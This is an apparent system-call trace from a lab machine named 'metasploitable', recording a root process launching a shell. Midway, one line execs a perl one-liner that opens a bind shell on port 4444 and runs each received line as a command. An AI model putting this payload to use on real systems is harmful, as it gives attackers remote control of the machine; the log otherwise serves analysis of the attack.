B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5832  07:10:56.072113 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

5832  07:10:56.072131 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e26000

5832  07:10:56.072142 mmap2(0xb7e2e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7e2e000

5832  07:10:56.072160 close(1)          = 0

5832  07:10:56.072172 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5832  07:10:56.072185 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

5832  07:10:56.072199 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5832  07:10:56.072286 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

5832  07:10:56.072303 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e1b000

5832  07:10:56.072314 mmap2(0xb7e24000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e24000

5832  07:10:56.072329 close(1)          = 0

5832  07:10:56.072349 munmap(0xb7fd6000, 29913) = 0

5832  07:10:56.072365 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

5832  07:10:56.072379 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

5832  07:10:56.072390 _llseek(1, 0, [0], SEEK_CUR) = 0

5832  07:10:56.072402 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

5832  07:10:56.072417 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fdd000

5832  07:10:56.072428 _llseek(1, 1624, [1624], SEEK_SET) = 0

5832  07:10:56.072442 munmap(0xb7fdd000, 1624) = 0

5832  07:10:56.072452 close(1)          = 0

5832  07:10:56.072511 getpgrp()         = 3831

5832  07:10:56.072537 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

5832  07:10:56.072552 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

5832  07:10:56.072571 brk(0x8101000)    = 0x8101000

5832  07:10:56.072601 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5832  07:10:56.072616 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5832  07:10:56.072629 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5832  07:10:56.072665 brk(0x8102000)    = 0x8102000

5832  07:10:56.072691 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5832  07:10:56.072709 stat64("/sbin/AB", 0xbfef6d48) = -1 ENOENT (No such file or directory)

5832  07:10:56.072721 stat64("/bin/AB", 0xbfef6d48) = -1 ENOENT (No such file or directory)

5832  07:10:56.072732 stat64("/usr/sbin/AB", 0xbfef6d48) = -1 ENOENT (No such file or directory)

5832  07:10:56.072743 stat64("/usr/bin/AB", 0xbfef6d48) = -1 ENOENT (No such file or directory)

5832  07:10:56.072756 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5832  07:10:56.072770 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e516f8) = 5833

5833  07:10:56.072813 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5833  07:10:56.072829 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5833  07:10:56.072842 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5833  07:10:56.072854 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5833  07:10:56.072868 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5833  07:10:56.072884 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5833  07:10:56.072896 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5833  07:10:56.072950 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

5833  07:10:56.072997 --- SIGPIPE (Broken pipe) @ 0 (0) ---

5833  07:10:56.073078 exit_group(127)   = ?

4519  07:10:56.089357 waitpid(5832,  <unfinished ...>

5832  07:10:56.119279 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5832  07:10:56.119279 --- SIGCHLD (Child exited) @ 0 (0) ---

5832  07:10:56.119279 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 5833

5832  07:10:56.119279 waitpid(-1, 0xbfef69c8, WNOHANG) = -1 ECHILD (No child processes)

5832  07:10:56.119280 sigreturn()       = ? (mask now [])

5832  07:10:56.119280 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5832  07:10:56.119280 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5832  07:10:56.119280 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5832  07:10:56.119281 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

5832  07:10:56.119281 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5832  07:10:56.119281 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

5832  07:10:56.119312 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5832  07:10:56.119332 stat64("/sbin/perl", 0xbfef6d78) = -1 ENOENT (No such file or directory)

5832  07:10:56.119344 stat64("/bin/perl", 0xbfef6d78) = -1 ENOENT (No such file or directory)

5832  07:10:56.119355 stat64("/usr/sbin/perl", 0xbfef6d78) = -1 ENOENT (No such file or directory)

5832  07:10:56.119366 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5832  07:10:56.119384 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5832  07:10:56.119407 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5832  07:10:56.119422 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e516f8) = 5834

5834  07:10:56.119481 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5834  07:10:56.119546 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5834  07:10:56.119576 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5834  07:10:56.119602 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5834  07:10:56.119616 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5834  07:10:56.119631 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5834  07:10:56.119643 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5834  07:10:56.119676 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

5834  07:10:56.119765 brk(0)            = 0x8153000

5834  07:10:56.119784 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5834  07:10:56.119799 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f10000

5834  07:10:56.119814 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5834  07:10:56.119831 open("/etc/ld.so.cache", O_RDONLY) = 1

5834  07:10:56.119843 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5834  07:10:56.119859 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f08000

5834  07:10:56.119870 close(1)          = 0

5834  07:10:56.119880 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5834  07:10:56.119894 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5834  07:10:56.119908 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5834  07:10:56.120107 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5834  07:10:56.120139 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f04000

5834  07:10:56.120151 mmap2(0xb7f06000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f06000

5834  07:10:56.120167 close(1)          = 0

5834  07:10:56.120178 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5834  07:10:56.120191 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

5834  07:10:56.120205 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

5834  07:10:56.120291 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

5834  07:10:56.120308 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7edf000

5834  07:10:56.120319 mmap2(0xb7f02000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f02000

5834  07:10:56.120334 close(1)          = 0

5834  07:10:56.120345 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5834  07:10:56.120362 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

5834  07:10:56.120375 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

5834  07:10:56.120459 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

5834  07:10:56.120476 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ede000

5834  07:10:56.120488 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec6000

5834  07:10:56.120499 mmap2(0xb7eda000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7eda000

5834  07:10:56.120513 mmap2(0xb7edc000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7edc000

5834  07:10:56.120526 close(1)          = 0

5834  07:10:56.120537 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5834  07:10:56.120550 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5834  07:10:56.120589 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5834  07:10:56.120727 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5834  07:10:56.120745 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d77000

5834  07:10:56.120756 mmap2(0xb7ec0000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ec0000

5834  07:10:56.120771 mmap2(0xb7ec3000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ec3000

5834  07:10:56.120783 close(1)          = 0

5834  07:10:56.120795 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5834  07:10:56.120808 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

5834  07:10:56.120822 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

5834  07:10:56.120911 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

5834  07:10:56.120928 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d45000

5834  07:10:56.120938 mmap2(0xb7d4e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d4e000

5834  07:10:56.120952 mmap2(0xb7d50000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d50000

5834  07:10:56.120965 close(1)          = 0

5834  07:10:56.120988 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d44000

5834  07:10:56.121000 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d448c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5834  07:10:56.121065 mprotect(0xb7ec0000, 4096, PROT_READ) = 0

5834  07:10:56.121092 munmap(0xb7f08000, 29913) = 0

5834  07:10:56.121104 set_tid_address(0xb7d44908) = 5834

5834  07:10:56.121113 set_robust_list(0xb7d44910, 0xc) = 0

5834  07:10:56.121122 futex(0xbf9c0e60, 0x81 /* FUTEX_??? */, 1) = 0

5834  07:10:56.121136 rt_sigaction(SIGRTMIN, {0xb7eca2c0, [], SA_SIGINFO}, NULL, 8) = 0

5834  07:10:56.121149 rt_sigaction(SIGRT_1, {0xb7eca340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

5834  07:10:56.121161 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

5834  07:10:56.121174 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

5834  07:10:56.121192 uname({sys="Linux", node="metasploitable", ...}) = 0

5834  07:10:56.121237 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

5834  07:10:56.121281 brk(0)            = 0x8153000

5834  07:10:56.121290 brk(0x8174000)    = 0x8174000

5834  07:10:56.121333 getuid32()        = 0

5834  07:10:56.121343 geteuid32()       = 0

5834  07:10:56.121352 getgid32()        = 0

5834  07:10:56.121360 getegid32()       = 0

5834  07:10:56.121396 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d23000

5834  07:10:56.121423 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

5834  07:10:56.121440 read(1, "\204(\237\301", 4) = 4

5834  07:10:56.121452 close(1)          = 0

5834  07:10:56.121470 time(NULL)        = 1495624256

5834  07:10:56.121509 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbf9c0b30) = -1 ENOENT (No such file or directory)

5834  07:10:56.121553 stat64("/usr/local/lib/site_perl/5.8.8", 0xbf9c0b30) = -1 ENOENT (No such file or directory)

5834  07:10:56.121603 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbf9c0b30) = -1 ENOENT (No such file or directory)

5834  07:10:56.121633 stat64("/usr/local/lib/perl/5.8.7", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121645 stat64("/usr/local/share/perl/5.8.7", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121657 stat64("/usr/local/lib/perl/5.8.6", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121669 stat64("/usr/local/share/perl/5.8.6", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121694 stat64("/usr/local/lib/perl/5.8.4", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121705 stat64("/usr/local/share/perl/5.8.4", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121720 stat64("/usr/local/lib/perl/5.8.3", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121731 stat64("/usr/local/share/perl/5.8.3", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121742 stat64("/usr/local/lib/perl/5.8.2", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121753 stat64("/usr/local/share/perl/5.8.2", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121765 stat64("/usr/local/lib/perl/5.8.1", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121776 stat64("/usr/local/share/perl/5.8.1", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121787 stat64("/usr/local/lib/perl/5.8.0", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121798 stat64("/usr/local/share/perl/5.8.0", 0xbf9c0c70) = -1 ENOENT (No such file or directory)

5834  07:10:56.121820 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9c0968) = -1 ENOTTY (Inappropriate ioctl for device)

5834  07:10:56.121833 _llseek(0, 0, [0], SEEK_CUR) = 0

5834  07:10:56.121845 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9c0968) = -1 EBADF (Bad file descriptor)

5834  07:10:56.121855 _llseek(1, 0, 0xbf9c09b0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

5834  07:10:56.121865 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9c0968) = -1 EINVAL (Invalid argument)

5834  07:10:56.121876 _llseek(2, 0, 0xbf9c09b0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

5834  07:10:56.121886 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

